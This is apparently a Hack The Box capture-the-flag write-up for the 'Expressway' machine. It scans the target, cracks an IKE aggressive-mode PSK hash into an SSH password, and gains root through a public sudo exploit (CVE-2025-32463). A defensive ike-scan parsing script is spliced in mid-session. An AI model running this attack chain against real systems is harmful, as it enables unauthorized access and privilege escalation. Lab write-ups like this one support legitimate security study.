HTB Expressway
Enum
First doing port scanning.
❯ nmap -sCV -T4 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:58 +0700
Nmap scan report for expressway.htb (10.10.11.87)
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only port 22 (SSH) appears open, so I rescanned using UDP.
sudo nmap -sU -p- --top-ports 200 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:59 +0700
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Port 500 (ISAKMP) is open.
Foothold
Using ike-scan.
❯ sudo ike-scan -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=37311a644b96bf83)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.084 seconds (11.94 hosts/sec). 1 returned handshake; 0 returned notify
Try using aggressive mode.
❯ sudo ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=7758f632446e0796)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.110 seconds (9.07 hosts/sec). 1 returned handshake; 0 returned notify
The responder discloses an ID of ike@expressway.htb.
Next, save the PSK hash in psk-crack format.
sudo ike-scan -M -A 10.10.11.87 --pskcrack=output.txt
Now crack the hash with psk-crack (hashcat or john also work) using the rockyou.txt wordlist.
psk-crack -d /usr/share/dict/rockyou.txt output.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash c1dd8393403ec99db7270e5d49def7c1659dace9
Ending psk-crack: 8045039 iterations in 46.258 seconds (173915.12 iterations/sec)
Now we have SSH credentials: username ike@expressway.htb and password freakingrockstarontheroad. Try to log in.
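As an added hardening aid (not part of the original writeup), the following Python script parses an ike-scan handshake block like the one above and reports the IKEv1 settings a defender should fix: aggressive mode with PSK, unauthenticated identity disclosure, and the legacy 3DES/SHA1/modp1024 transform. The policy thresholds it applies are my assumptions.

```python
import re
# ike-scan aggressive-mode output copied from the writeup above (used here as constructed test input).
SAMPLE = """10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=7758f632446e0796)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
"""

def parse_ike_scan(text):
    """Parse one ike-scan host block into mode, SA attributes, responder ID and vendor IDs."""
    result = {"mode": None, "sa": {}, "id": None, "vids": []}
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\S+\s+(Main|Aggressive) Mode Handshake returned", line)
        if m:
            result["mode"] = m.group(1)
        elif (m := re.match(r"^SA=\((.*)\)$", line)):
            # "Enc=3DES Hash=SHA1 ..." -> {"Enc": "3DES", "Hash": "SHA1", ...}
            result["sa"] = dict(kv.split("=", 1) for kv in m.group(1).split())
        elif (m := re.match(r"^ID\(Type=(\w+), Value=([^)]*)\)$", line)):
            result["id"] = (m.group(1), m.group(2))
        elif (m := re.match(r"^VID=[0-9a-f]+ \((.*)\)$", line)):
            result["vids"].append(m.group(1))
    return result

def weak_policy_findings(parsed):
    """Hardening findings for a parsed handshake; the thresholds below are this script's assumptions."""
    sa, findings = parsed["sa"], []
    if parsed["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        findings.append("aggressive mode with PSK: the responder hash can be cracked offline")
    if parsed["id"] and parsed["id"][0] == "ID_USER_FQDN":
        findings.append("identity disclosed without authentication: " + parsed["id"][1])
    if sa.get("Enc") in ("DES", "3DES"):
        findings.append("legacy cipher " + sa["Enc"])
    if sa.get("Hash") in ("MD5", "SHA1"):
        findings.append("legacy hash " + sa["Hash"])
    m = re.search(r"modp(\d+)", sa.get("Group", ""))
    if m and int(m.group(1)) < 2048:
        findings.append("DH group " + sa["Group"] + " is below 2048 bits")
    return findings

if __name__ == "__main__":
    for finding in weak_policy_findings(parse_ike_scan(SAMPLE)):
        print("[!]", finding)
```

Feed it the output of any ike-scan run against your own VPN gateway; a clean result means main mode, certificate or strong-PSK authentication, and a modern transform set.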
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
ike@expressway:~$
Privilege Escalation
First, run sudo -l.
ike@expressway:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
For security reasons, the password you type will not be visible.
Password:
Sorry, try again.
This looks like a custom sudo build. Check where the sudo binary lives.
ike@expressway:~$ which sudo
/usr/local/bin/sudo
ike@expressway:~$
This is not the default sudo location.
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Search for public exploits for this version.
CVE-2025-32463.
Using this exploit: https://github.com/kh4sh3i/CVE-2025-32463
Copy it to the machine using SCP.
scp exploit.sh ike@expressway.htb:/tmp
ike@expressway.htb's password:
exploit.sh
On the machine, run id first to check the current user.
ike@expressway:/tmp$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Pwned.
root@expressway:/# cat /root/root.txt